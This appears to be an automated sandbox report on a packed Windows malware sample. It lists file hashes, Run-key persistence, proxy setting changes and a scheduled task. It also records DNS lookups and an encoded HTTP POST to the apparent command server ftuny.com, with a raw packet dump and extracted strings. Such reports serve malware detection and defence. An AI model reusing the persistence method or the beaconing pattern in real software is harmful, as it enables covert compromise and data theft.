Analysis Date2014-08-22 08:50:21
MD590d03ea797e70f5f70a3600b02480c9d
SHA139a36b13ac679c8ddc55212ab24774129cebc3e0

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
SectionUPX0 md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
SectionUPX1 md5: 22be90dce248bb32f69c4057f131dbed sha1: 1143202818d0e9c65a2c6027385d694e5d13d489 size: 145920
Section.rsrc md5: a1607d303063e8da73bf57c821362a6e sha1: 9a545157e65ca6977465951ac889403778d5adbb size: 1024
Timestamp1992-06-19 22:22:17
PackerUPX -> www.upx.sourceforge.net
PEhashddf0000c2beff9c4fe9ce52a400180f6c5d6556e
IMPhashbf68d6af7ffbfe567c70a675e5633654

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates ProcessC:\malware.exe
Creates MutexGlobal\{F5CC5A0A-B9E5-411f-BF7E-EACE3BBC2BF1}
Creates Mutex{A14B1A1D-023F-40dc-BBFE-208B1DAD2F82}

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\Software\OUU6KC5WPX\OteH ➝
xC7aKZ+O6wyPlq1krRM4sG7m2LFGsYtHjHOagBf10Uk/n4gL8s8xs9LeD5KQVh3/j+XFa0mnr175UElKKyciA2gn6tUEA721Fj4P\\x00
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\OUU6KC5WPX ➝
C:\malware.exe
RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\\\x03\1601 ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FileC:\WINDOWS\Tasks\{22116563-108C-42c0-A7CE-60161B75E508}.job
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates MutexGlobal\{F5CC5A0A-B9E5-411f-BF7E-EACE3BBC2BF1}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex{A14B1A1D-023F-40dc-BBFE-208B1DAD2F82}
Winsock DNSftuny.com

Network Details:

DNSscribd.com
Type: A
23.235.44.175
DNSavg.com
Type: A
93.184.211.28
DNSavg.com
Type: A
93.184.217.9
DNSftuny.com
Type: A
208.73.211.163
DNSftuny.com
Type: A
208.73.211.174
DNSftuny.com
Type: A
208.73.211.175
DNSftuny.com
Type: A
208.73.211.193
DNSftuny.com
Type: A
208.73.211.242
DNSphreeway.com
Type: A
HTTP POSThttp://ftuny.com/borders.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Flows TCP192.168.1.1:1031 ➝ 208.73.211.163:80

Raw Pcap
0x00000000 (00000)   504f5354 202f626f 72646572 732e7068   POST /borders.ph
0x00000010 (00016)   70204854 54502f31 2e310d0a 41636365   p HTTP/1.1..Acce
0x00000020 (00032)   70743a20 2a2f2a0d 0a436f6e 74656e74   pt: */*..Content
0x00000030 (00048)   2d547970 653a2061 70706c69 63617469   -Type: applicati
0x00000040 (00064)   6f6e2f78 2d777777 2d666f72 6d2d7572   on/x-www-form-ur
0x00000050 (00080)   6c656e63 6f646564 0d0a5573 65722d41   lencoded..User-A
0x00000060 (00096)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x00000070 (00112)   30202863 6f6d7061 7469626c 653b204d   0 (compatible; M
0x00000080 (00128)   53494520 362e303b 2057696e 646f7773   SIE 6.0; Windows
0x00000090 (00144)   204e5420 352e3029 0d0a486f 73743a20    NT 5.0)..Host: 
0x000000a0 (00160)   6674756e 792e636f 6d0d0a43 6f6e7465   ftuny.com..Conte
0x000000b0 (00176)   6e742d4c 656e6774 683a2033 34310d0a   nt-Length: 341..
0x000000c0 (00192)   436f6e6e 65637469 6f6e3a20 4b656570   Connection: Keep
0x000000d0 (00208)   2d416c69 76650d0a 43616368 652d436f   -Alive..Cache-Co
0x000000e0 (00224)   6e74726f 6c3a206e 6f2d6361 6368650d   ntrol: no-cache.
0x000000f0 (00240)   0a0d0a64 6174613d 2f436a45 665a4453   ...data=/CjEfZDS
0x00000100 (00256)   76787143 694b306c 74554d31 7579322f   vxqCiK0ltUM1uy2/
0x00000110 (00272)   79753455 3559704e 6d31762f 2f6a546e   yu4U5YpNm1v//jTn
0x00000120 (00288)   6756632b 774d732b 2b5a426a 375a5359   gVc+wMs++ZBj7ZSY
0x00000130 (00304)   54723369 426b472f 672b3756 43432f30   Tr3iBkG/g+7VCC/0
0x00000140 (00320)   7055336b 4f487037 65526348 5069596f   pU3kOHp7eRcHPiYo
0x00000150 (00336)   3939494d 55756a67 55573462 76544964   99IMUujgUW4bvTId
0x00000160 (00352)   4e2f6a50 58754750 6a61427a 786c6363   N/jPXuGPjaBzxlcc
0x00000170 (00368)   356d704e 30316136 742f5169 53585877   5mpN01a6t/QiSXXw
0x00000180 (00384)   707a3948 6d306b7a 39664266 61556e31   pz9Hm0kz9fBfaUn1
0x00000190 (00400)   30782f47 4c636f66 52694834 4c764673   0x/GLcofRiH4LvFs
0x000001a0 (00416)   41694759 46736169 6f4d5730 374b3045   AiGYFsaioMW07K0E
0x000001b0 (00432)   33726b6b 334d655a 55796744 654c4777   3rkk3MeZUygDeLGw
0x000001c0 (00448)   32733132 2b6f504d 4e726e4a 5a637a68   2s12+oPMNrnJZczh
0x000001d0 (00464)   7a5a3878 694e5775 3554674f 6871344f   zZ8xiNWu5TgOhq4O
0x000001e0 (00480)   71555330 424d5464 4b32625a 792f6878   qUS0BMTdK2bZy/hx
0x000001f0 (00496)   33546e6d 47795446 4c48684c 6352662b   3TnmGyTFLHhLcRf+
0x00000200 (00512)   76417a49 4f424e6d 76343343 444b3251   vAzIOBNmv43CDK2Q
0x00000210 (00528)   30354156 636d4138 324b6854 66557373   05AVcmA82KhTfUss
0x00000220 (00544)   2f476f6c 77786c6d 396b4c72 76336c49   /Golwxlm9kLrv3lI
0x00000230 (00560)   365a6b36 6e333664 2f33346b 70565633   6Zk6n36d/34kpVV3
0x00000240 (00576)   59365168 2f413d3d                     Y6Qh/A==


Strings
!O
.<

0dhkqD
0$Ex$x
0@G+u{
164<	8
 1mmUua
1(WybC
	%2tsl
2]Z$Gwc
)/3IE}c"
<3Q%uj
3S9V}[
4bEX&T9
4`'\CH
4WH )lm(
5AGD5{
&@5_mI
5o6Aiq
5/u|h-
60+P7[
6m!B~g
6P&y/za@
6St4hi
7-,0KO
75orc}
.'|76v
~7E),+
7e>[h8]
?)7Fd2
7:FF6XG
7iO	>G
7Kd:b;
81nth3
8;[RF|
>]8sOd
]8*tbk#
8xdZns
9@8/n).
"9/B*}
9ja4rW
]=9L^~
)9:u_o!R
a[:BZ;
aC7v~~0
ak,`a`
AltTabInfoF
>,an(P
</assembly>
   <assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="WindowsUAC" type="win32"/>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> 
B@;5)sqHt
b[#8W)a
;~b gv
bmCCGt
B`|R)l
b|~wz"
)C5==+
C5fZ<8
c8\@t$
CancelDC
ce910bfic
~celDCC
_cfnt]
Chf(X(
C-_H U
@CIbV$
C_^PSt
cQ,9m'
CsK+CG4z
d']#[;
.~D$3}
D7BnwQ7E
d9%Yz '
d#:AGw
;`DB_B
DebugBGk
D#E$:l
DIKHj,v
}DkK2cp
Dol*hS
d#Q'*3
"<D=uG
	E~1}Q@
e5At9U
"|E96@
|)Ej<)
eL/ 4K:N
E=L"=t
E-mV%6
e}u4oTp
ExitProcess
F}""A"
Fk=,%l
FLMclb
fPK%:4A
` Fu(n
f}!"&x<
fXm/u_
)FZP^Y{
=~>%>@G
g/+}6~
gdi32.dll
GetProcAddress
GGetPkc
g<tO|lF
hDZxRAo
hhh#Ov
HideCaret
$hl<wu4m
+H\q:~
h@(zuu5k
?}I%G%*HO0
i)i8i'
ipt	=|
IsV)idCodePage
It<H2D
iwfq\l
(J+b';
#J%h37
*jk;lF'
J`l& kB/
j=&\~@o`
J{sxz2
K 2#\m
>	#k8g
KERNEL32.DLL
KsLj#At
\l:0/B
[l6y=G
%\l_]7
.l86<J3Z9;
LC%3s9
(l#/|]cM	
^L/D>6
LoadLibraryA
/LoadLibraryExW
lpIh}:j$
(LUC~z
=;l;vJ
M7|mi:g
m+9WEt
m|eqa7V
M"f#.!
mHa{E4t
m$p[.7
m_Qpv8
mRhk!e
mVDnR;
N2P37Qya
n5t,Q'
<N84PsX
	+\Nbd[I
ndu}?p 5
n!GF:B
NJBK;m
;.njh8
N'LSN;S
n{|ob-
N	rNj{X
n<}tY'
	o	~4|cln
o"7&Oaf+
o;>/i!
OtMJ##
-OX*_+u
p]7noNw)
piBNSI
:P_M==v
PPdMo.
^P{RzM
pS6c-z
\PTi44|
!ptz8w
pyFiX'
Q0q-?$=
Q5(6>x
Q5t<p 
Q7FuT:f
Q&&;\$Don
 Q_>e:l
qKJ!FQO
}qO`F{
Qt7}Gk
QtHeuj
q,>,@v
==qyf9Y~
!r2oq[
r<8|:S3
r%`AG9:
RBbLGO
ReadPrinter
r~Ebk?
            <requestedExecutionLevel level="highestAvailable"/> 
         </requestedPrivileges>
         <requestedPrivileges>
*r&jUl
}]ro=n
]r[To+
`Rt`'s?~+h
R=u?HS5
:Rw_+&
SCODEN
SC<!O*E
      </security>
      <security>
si2F+"
sJ@F8`z
SMC[n=
/s.TlHQt
StringX
S?Utm!9oP
sv((uka
.}_<T"
t} 4/\|E
T5@wY{]
TA*[}i
]T_A yE
tG;B@o
This program must be run under Win32
t:m|>VZ
?(	t!qn
=,TRNL
   </trustInfo>
      <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
u4u[?`
ufX'\.
u<j:6B
u+:Jy| 
#ukCW.
u#Q9-3b
user32.dll
V,9'!T
VirtualAlloc
VirtualAlloc&
VirtualFree
VirtualProtect
vKwfI`
vst<nsoleWindowSiz9Enum{
_vyNCD.8
)v,yQF
W!4:hS
_]w88/
widaA]
winspool.drv
[wJa6]
WMI ].b
=~ wN*
>WN&2Cci9kzkb[
\W=sC=
W=T4Z 
Wu_66|
WV6vm<
w:"Xz}4C
X8La8;
-=x+>B
x>>b7|v
{Xhw4w
XI	{sN
x(m7|}u_Y
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+)XP	6
XPTPSW
xQ#o<U
#^xun{
]xxQO;
+xY2J'
YeMthW
:(_Y$H
|:)yJ3@W
Z_4Q-:
z9T2[E
Zf`.c|
zg<uG0nE
z=<(jx
zKPHWl
Z`M"CSa
Zn$;2#F=
]zODl?
z>v_5<
zvQ:tj